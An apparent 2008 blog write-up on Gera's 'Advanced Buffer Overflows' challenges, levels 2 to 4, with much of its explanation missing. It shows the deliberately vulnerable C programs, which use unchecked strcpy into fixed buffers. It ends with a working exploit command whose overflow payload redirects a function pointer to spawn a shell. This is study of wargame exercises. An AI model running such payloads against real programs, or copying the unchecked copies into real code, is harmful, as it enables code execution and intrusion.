Advanced Buffer Overflows, Take

Oct 20, 2008
·
challenge
exploit

Hello again fellows, tonight, we'll take another step ahead in solving gera's programming challenges with this second take in the Advanced Buffer Overflows section. Unlike the previous take, this one will cover more than one level: from second to fourth to be more precise. As usual we'll take a look at the source and make an hypothesis on the possible attack path to follow. Without greater delay, let's begin. This is how #2 looks like:

int main(int argv,char **argc) {
char buf[256];
    strcpy(buf,argc[1]);
    exit(1);
}







int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256];

    fn=(void(*)(char*))&puts;
    strcpy(buf,argc[1]);
    fn(argc[2]);
    exit(1);
}









extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
char *pbuf=malloc(strlen(argc[2])+1);
char buf[256];

    fn=(void(*)(char*))&puts;
    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    fn(argc[3]);
    while(1);
}













infi@labo:~/InsecureProgramming$ ./abo4 `python -c 'print "A"*268+"\x4c\x97\x04\x08"'` `python -c 'print "\x40\xff\xff\xbf"'` CCCC
sh-3.00$

Advanced Buffer Overflows, Take

« Fandango on free()

« Torvalds Mad at Security Industry

« WARMING UP on STACK - Part I

Advanced Buffer Overflows Revolutions »

MoreNops goes 2.0! »

Book Review - Reversing, Secrets of Reverse Engineering. »